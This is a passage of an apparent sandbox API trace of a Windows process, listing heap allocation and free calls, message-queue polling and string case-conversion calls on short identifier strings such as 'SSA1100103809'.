Size=0x4) returned 0x2a72278 [0168.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0168.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0168.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0168.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0168.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0168.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0168.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0168.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0168.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0168.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0168.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0168.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0168.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.375] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.375] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.375] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.375] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.375] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0168.375] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.375] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0168.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.376] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0168.376] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.376] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0168.376] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.376] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0168.376] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.377] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.377] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.377] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.377] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0168.377] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.377] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0168.377] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0168.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0168.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0168.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0168.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.378] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.378] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0168.378] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.378] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0168.378] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0168.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0168.380] HeapFree (in: 